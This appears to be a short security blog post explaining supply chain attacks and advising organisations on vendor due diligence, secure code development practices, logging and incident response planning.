Many people are a little shaky on just what a supply chain attack is. A supply chain attack occurs when a trusted vendor or service provider with access to your network is compromised by an attacker, who then uses this exposure to attack your network. This can be either through service providers that have direct access to your network, or through compromised third-party software applications that you use on your network. These kinds of vulnerabilities have been plaguing networks for years, but we’ve never seen the level and complexity of supply chain attacks we experienced last fall. And the problem is far from over; NIST expects these attacks are only likely to grow due to insufficient protection of software development and distribution channels, combined with the fact that other cyberattack paths are becoming more difficult to exploit.
So, what can you do now to get ready for more supply chain attacks? The first thing is to ensure that you have a strong vendor management program in place. You should perform due diligence when choosing and implementing service providers and software providers / applications. Review their history to see if there any past security incidents with their services or applications, review their information security program and ensure that they have strong controls in place, review results of vulnerability assessments, code reviews and penetration tests to see if problems were detected and what was done to remediate those problems, and perform these checks on a regular basis; not just once.
When dealing with software providers, look into their code development, sharing and storage practices if possible. Are they checking the integrity of their code by scanning for malware before each build is released? Do they use multifactor authentication to sign on to machines that have access to their codebase? Is access to coding projects based on least privilege / need-to-know, or does the whole development team have access? If a vendor’s code development process is strong, they should have no problem sharing this information with you. It’s important to remember that when you hire a service provider or use a developer’s code on your network, you are essentially making them an integral part of your business, just like one of your regular employees. If your private information is compromised because of a vendor security failure, the ultimate responsibility for that information compromise is on your shoulders, not theirs.
You should also ensure that you and your vendors have strong security monitoring and incident response programs in place. Logging on your network should be verbose, and enabled on all devices and programs that are capable of it. In addition, those logs need to be aggregated, parsed and examined by qualified human analysts. And if a compromise of the supply chain occurs, you should have incident response plans in place so you can react quickly and correctly. Practice the plan and be sure to incorporate lessons-learned so that improvement is constant. Doing all of these things is not the whole answer, but will give your organization a good start in dealing with supply chain security problem.